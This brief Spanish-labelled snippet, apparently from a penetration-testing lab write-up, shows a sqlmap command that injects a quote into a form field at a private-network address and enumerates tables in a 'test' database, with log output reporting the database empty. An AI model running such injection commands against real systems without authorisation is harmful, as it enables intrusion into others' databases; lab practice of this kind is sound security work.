**Comando base:** `sqlmap -u "http://192.168.0.17/list/" --data="name=ZAP&email=%27zap@zap.com&phone=ZAP&org=ZAP"`

**Opción adicional:** `-D test --tables`

**Resultado:**
```
[02:19:27] [INFO] fetching tables for database: 'test'
[02:19:27] [INFO] fetching number of tables for database 'test'
[02:19:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:19:27] [INFO] retrieved: 0
[02:19:28] [WARNING] database 'test' appears to be empty
[02:19:28] [ERROR] unable to retrieve the table names for any database
```
